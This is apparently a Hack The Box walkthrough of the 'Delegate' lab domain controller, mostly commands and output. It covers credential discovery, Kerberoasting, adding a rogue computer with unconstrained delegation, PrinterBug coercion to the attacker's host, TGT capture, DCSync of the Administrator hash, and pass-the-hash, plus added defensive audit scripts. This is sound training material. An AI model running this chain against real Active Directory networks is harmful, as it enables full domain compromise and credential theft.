delegate - hack the box

Attacker IP: 10.10.14.118 Target IP: 10.129.125.244

Network Enumeration

nmap -sCVS 10.129.125.244

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-14 12:48:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-14T12:48:49+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2025-09-13T12:32:58
|_Not valid after:  2026-03-15T12:32:58
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   DNS_Tree_Name: delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-14T12:48:09+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-09-14T12:48:14
|_  start_date: N/A

nxc smb delegate.vl -u 'guest' -p '' --shares

Guest access is enabled for some SMB shares


NETLOGON share has a file named users.bat. We download this file to our attacking machine.

users.bat


users.bat contains the usernames A.Briggs and Administrator, as well as the password P4ssw0rd1#123.


The password found in the file works with the A.Briggs account; we tested this by authenticating over SMB.

nxc smb delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' --shares


The account does not have any other share permissions when compared to the guest account. Since this is an Active Directory environment we can run Bloodhound to see if there are any configurations we can exploit.

Bloodhound

We use bloodhound-python to gather the data that will be ingested by Bloodhound. This is done by connecting to various services (SMB, LDAP, RPC) with an authenticated account to enumerate the Active Directory environment.

bloodhound-python -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.129.125.244 -d 'delegate.vl'

We look at the outbound control that A.Briggs has. The account has GenericWrite permissions over N.Thompson. With this, we can attempt Targeted Kerberoasting.

Targeted Kerberoasting

An attacker with GenericWrite can set a Service Principal Name (SPN) on a target user account, then perform Kerberoasting to crack the account's password offline. This is particularly effective against accounts with weak passwords.

python targetedKerberoast.py -v -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123'


We get a hash for N.Thompson that we can try to crack using hashcat.

hashcat hash ~/Desktop/tools/rockyou.txt

hashcat will automatically recognize the hash as mode 13100 (Kerberos 5, etype 23, TGS-REP).
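As an added illustration that is not part of the original writeup, the following Python parses the $krb5tgs$ lines that tools like targetedKerberoast emit, maps the encryption type to the hashcat mode named above (13100 for etype 23, 19600/19700 for the AES etypes), and lists which accounts are still being issued RC4-encrypted service tickets. That last list is what a defender wants: those SPN accounts are the cheapest to attack offline and should be moved to AES-only (msDS-SupportedEncryptionTypes, followed by a password change so AES keys exist) or replaced by gMSAs. The sample lines are constructed with dummy hex and carry no real ticket data.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# hashcat mode for each Kerberos 5 TGS-REP encryption type (public hashcat mapping)
TGS_REP_HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}


@dataclass
class TgsRepHash:
    etype: int
    user: str
    realm: str
    spn: Optional[str]
    checksum: str
    edata: str

    @property
    def hashcat_mode(self) -> int:
        return TGS_REP_HASHCAT_MODES[self.etype]

    @property
    def rc4(self) -> bool:
        # etype 23 (RC4-HMAC) keys are the NT hash itself, so offline guessing is
        # far cheaper than for the PBKDF2-derived AES etypes.
        return self.etype == 23


_HEADER = re.compile(r"^\$krb5tgs\$(\d+)\$(.*)$")


def parse_tgs_rep(line: str) -> TgsRepHash:
    """Parse one $krb5tgs$ line in the layout impacket-style tools write out."""
    m = _HEADER.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ line")
    etype = int(m.group(1))
    if etype not in TGS_REP_HASHCAT_MODES:
        raise ValueError(f"unsupported etype {etype}")
    body = m.group(2)
    if etype == 23:
        # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        if not body.startswith("*") or "*$" not in body:
            raise ValueError("malformed etype 23 hash")
        head, rest = body[1:].split("*$", 1)
        user, realm, spn = head.split("$", 2)
        checksum, edata = rest.split("$", 1)
        expected_checksum_len = 32          # 16-byte HMAC-MD5
    else:
        # $krb5tgs$17|18$user$REALM$*spn*$checksum$edata  (the *spn* field is optional)
        parts = body.split("$")
        if len(parts) < 4:
            raise ValueError("malformed AES hash")
        user, realm = parts[0], parts[1]
        if parts[2].startswith("*") and parts[2].endswith("*"):
            spn, checksum, edata = parts[2][1:-1], parts[3], "$".join(parts[4:])
        else:
            spn, checksum, edata = None, parts[2], "$".join(parts[3:])
        expected_checksum_len = 24          # 12-byte HMAC-SHA1-96
    if len(checksum) != expected_checksum_len or not re.fullmatch(r"[0-9a-f]+", checksum + edata):
        raise ValueError("checksum/edata are not hex of the expected length")
    return TgsRepHash(etype, user, realm, spn, checksum, edata)


def rc4_exposed_accounts(lines: List[str]) -> List[str]:
    """Accounts whose service tickets were issued with RC4, in first-seen order."""
    seen: List[str] = []
    for line in lines:
        h = parse_tgs_rep(line)
        if h.rc4 and h.user not in seen:
            seen.append(h.user)
    return seen


# Constructed sample export (dummy hex, not real ticket material).
SAMPLE_EXPORT = [
    "$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$"
    + "0123456789abcdef" * 2 + "$" + "89abcdef" * 16,
    "$krb5tgs$18$svc_sql$DELEGATE.VL$*MSSQLSvc/db01.delegate.vl:1433*$"
    + "a1b2c3d4e5f60718293a4b5c" + "$" + "0f1e2d3c" * 16,
]

if __name__ == "__main__":
    for line in SAMPLE_EXPORT:
        h = parse_tgs_rep(line)
        print(f"{h.user:<12} etype={h.etype} mode={h.hashcat_mode} spn={h.spn}")
    print("still issued RC4 tickets:", rc4_exposed_accounts(SAMPLE_EXPORT))
```

hashcat refuses a file that mixes modes, which is why the etype is worth reading off the line before cracking; the defender's takeaway is the reverse of that, since every etype 23 line is an account whose encryption types still allow RC4.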

We get the password for N.Thompson:

N.Thompson:KALEB_2341


We are able to connect to the target via WinRM with these credentials.

N.Thompson

evil-winrm -i delegate.vl -u 'N.Thompson' -p 'KALEB_2341'

whoami /priv


We check the privileges that N.Thompson has and notice SeEnableDelegationPrivilege.

https://www.thehacker.recipes/ad/movement/kerberos/delegations/

SeEnableDelegationPrivilege

SeEnableDelegationPrivilege is a powerful Windows user right that allows an account to enable computer and user accounts to be trusted for delegation. This privilege is typically assigned to domain administrators and can be significantly abused if compromised.

What SeEnableDelegationPrivilege Allows

Delegation Configuration

An account with SeEnableDelegationPrivilege can modify the delegation settings on computer and user accounts, specifically:

  • Enable unconstrained delegation
  • Configure constrained delegation
  • Set up resource-based constrained delegation (RBCD)
  • Modify the msDS-AllowedToDelegateTo attribute
  • Set the TRUSTED_FOR_DELEGATION flag

The attack we will be performing is RBCD.

Resource-Based Constrained Delegation (RBCD)

This is often the most practical abuse method. The attacker can:

  • Create or compromise a computer account
  • Configure RBCD to allow this computer to delegate to high-value targets
  • Use the S4U2Self and S4U2Proxy protocols to impersonate privileged users
  • Access sensitive resources as domain administrators

Limited Computer Creation Rights

By default, domain users can create up to 10 computer accounts in Active Directory (controlled by the ms-DS-MachineAccountQuota attribute). However, this quota may have been modified by administrators.

Why Check MachineAccountQuota?

Before attempting to create a new computer account, the attacker needs to know:

  • What the current quota limit is
  • How many computer accounts have already been created by domain users
  • Whether they can create additional computer accounts

We can use nxc to retrieve this information.

nxc ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq


We can also accomplish this using ldapsearch with this query:

ldapsearch -x -H ldap://dc1.delegate.vl -D "[email protected]" -W -b "DC=delegate,DC=vl" "(objectClass=domain)" ms-DS-MachineAccountQuota


Use impacket-addcomputer to add our malicious computer to the AD environment.

impacket-addcomputer -computer-name 'EvilPC' -computer-pass 'Password123!' 'dc1.delegate.vl/N.Thompson:KALEB_2341' -dc-ip 10.129.125.244


Next we enable unconstrained delegation on our malicious computer.

# Set the TRUSTED_FOR_DELEGATION flag (0x80000)
$computer = Get-ADComputer -Identity "YOURCOMPUTER"
Set-ADAccountControl -Identity $computer -TrustedForDelegation $true

# Verify it's enabled
Get-ADComputer -Identity "YOURCOMPUTER" -Properties TrustedForDelegation | 
    Select-Object Name, TrustedForDelegation
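The TRUSTED_FOR_DELEGATION bit set above, the MachineAccountQuota discussed earlier and the delegation settings listed under "Delegation Configuration" are exactly what a defender should be auditing for. As an added example that is not from the original writeup, here is a Python audit over a few constructed LDAP entries (the attribute names are the real Active Directory ones; the account values and the SID are made up) that reports unconstrained, constrained and resource-based delegation, flags computer objects that were joined through the quota (mS-DS-CreatorSID is populated in that case), and warns when the quota is non-zero or a privileged account lacks the NOT_DELEGATED bit.

```python
import json
from typing import Any, Dict, List

# userAccountControl bits that matter for delegation (Microsoft-documented values)
UF_NORMAL_ACCOUNT                 = 0x00000200
UF_WORKSTATION_TRUST_ACCOUNT      = 0x00001000
UF_SERVER_TRUST_ACCOUNT           = 0x00002000   # set on domain controllers
UF_TRUSTED_FOR_DELEGATION         = 0x00080000   # unconstrained delegation
UF_NOT_DELEGATED                  = 0x00100000   # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000   # constrained delegation with protocol transition


def enable_unconstrained(uac: int) -> int:
    """The bit operation Set-ADAccountControl -TrustedForDelegation $true performs."""
    return uac | UF_TRUSTED_FOR_DELEGATION


def delegation_findings(entry: Dict[str, Any]) -> List[str]:
    """Classify one account's delegation posture from its LDAP attributes."""
    uac = int(entry.get("userAccountControl", 0))
    findings: List[str] = []
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
    if uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:
        # Every TGT forwarded to this principal is reusable by whoever controls it.
        # On a DC the bit is expected; anywhere else it deserves a ticket.
        findings.append("unconstrained delegation")
    if entry.get("msDS-AllowedToDelegateTo"):
        kind = "constrained delegation to " + ", ".join(entry["msDS-AllowedToDelegateTo"])
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            kind += " (protocol transition)"
        findings.append(kind)
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("RBCD configured on this resource")
    if entry.get("mS-DS-CreatorSID"):
        # Only populated when a non-admin joined the object via the MachineAccountQuota.
        findings.append(f"created via MachineAccountQuota by {entry['mS-DS-CreatorSID']}")
    return findings


def audit_delegation(entries: List[Dict[str, Any]], maq: int, protected_accounts) -> Dict[str, Any]:
    """Run delegation_findings over every entry and add domain-wide warnings."""
    report: Dict[str, Any] = {"findings": {}, "warnings": []}
    for entry in entries:
        name = entry["sAMAccountName"]
        hits = delegation_findings(entry)
        if hits:
            report["findings"][name] = hits
        if name in protected_accounts and not int(entry.get("userAccountControl", 0)) & UF_NOT_DELEGATED:
            report["warnings"].append(f"{name} lacks NOT_DELEGATED, so its TGT can be forwarded to a delegating host")
    if maq > 0:
        report["warnings"].append(f"ms-DS-MachineAccountQuota is {maq}: any domain user can add computer objects")
    return report


# Constructed sample of what an LDAP query of the domain might return; the SID is a placeholder.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC1$",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "EvilPC$",
     "userAccountControl": enable_unconstrained(UF_WORKSTATION_TRUST_ACCOUNT),
     "mS-DS-CreatorSID": "S-1-5-21-0-0-0-1105"},          # placeholder SID, not a real one
    {"sAMAccountName": "svc_web$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.delegate.vl"]},
    {"sAMAccountName": "N.Thompson", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "Administrator", "userAccountControl": UF_NORMAL_ACCOUNT},
]

if __name__ == "__main__":
    print(json.dumps(audit_delegation(SAMPLE_ENTRIES, maq=10, protected_accounts={"Administrator"}), indent=2))
```

Two of the findings come straight from the steps in this walkthrough: a computer object with mS-DS-CreatorSID set is one that a plain domain user joined via the quota, and a non-DC with TRUSTED_FOR_DELEGATION is the precondition for the TGT capture that follows.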


DNS & SPN addition

https://github.com/dirkjanm/krbrelayx

python dnstool.py -u 'delegate.vl\EvilPC$' -p 'Password123!' -r EvilPC.delegate.vl -d 10.10.14.118 --action add -dns-ip 10.129.125.244 dc1.delegate.vl

We add a DNS record so that our malicious computer can be discovered by name and resolves to our attacking machine.


We are also going to add SPNs. These are important because without them, no TGT will be captured.

Without SPNs:

User tries to connect → No SPN found → Connection fails or uses NTLM → No TGT captured

With SPNs:

User connects → Kerberos finds SPN → Requests service ticket → Sends TGT due to unconstrained delegation → You capture TGT

python addspn.py DC1.delegate.vl -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/EvilPC.delegate.vl' -t 'EvilPC$' -dc-ip 10.129.125.244 --additional


We can verify that this was successfully added with this command:

Get-ADComputer -Identity "EVILPC" -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames


Once this is complete we can use printerbug to capture a TGT.

PrinterBug

What PrinterBug Does

PrinterBug exploits the MS-RPRN (Print System Remote Protocol) to force a target machine to authenticate to an attacker-controlled server. It’s one of the most reliable authentication coercion techniques in Windows environments.

How PrinterBug Works

  1. Initial RPC Call:
Attacker -> Target: "Hey, monitor printer changes and send notifications to 10.10.14.118"
  2. Target Response:
Target -> Attacker's IP: Attempts SMB connection with machine authentication
  3. Kerberos Authentication:
Target requests service ticket for CIFS/EvilPC.delegate.vl
If unconstrained delegation is enabled, TGT is included and cached

First we need to convert the password of our EvilPC account to an NT hash so we can decrypt the Kerberos ticket.

Here is a Python script to do this:

import hashlib

password = "ENTER YOUR PASSWORD HERE"
# The NT hash is MD4 over the UTF-16LE encoding of the password.
# hashlib's 'md4' comes from OpenSSL; on OpenSSL 3 builds it can be missing
# ("unsupported hash type md4") unless the legacy provider is loaded.
ntlm_hash = hashlib.new('md4', password.encode('utf-16le')).hexdigest()
print(f"NTLM Hash: {ntlm_hash}")

Set up your listener:

python3 krbrelayx.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe

We execute printerbug afterwards and look for the response:

python printerbug.py -hashes :2b576acbe6bcfda7294d6bd18041b8fe delegate.vl/EvilPC\[email protected] EvilPC.delegate.vl


Finally we can perform a DCSync attack with this ticket to obtain the Administrator hash. impacket-secretsdump does the following:

  1. Uses your captured TGT to authenticate to the domain controller
  2. Performs DCSync replication to extract the Administrator’s password hash
  3. Returns the NTLM hash for the Administrator account

impacket-secretsdump -k dc1.delegate.vl -just-dc-user Administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::


evil-winrm -i 10.129.125.244 -u 'administrator' -H 'c32198ceab4cc695e65045562aa3ee93'

We are able to connect with our hash and get our flag. pwned


pwnand.win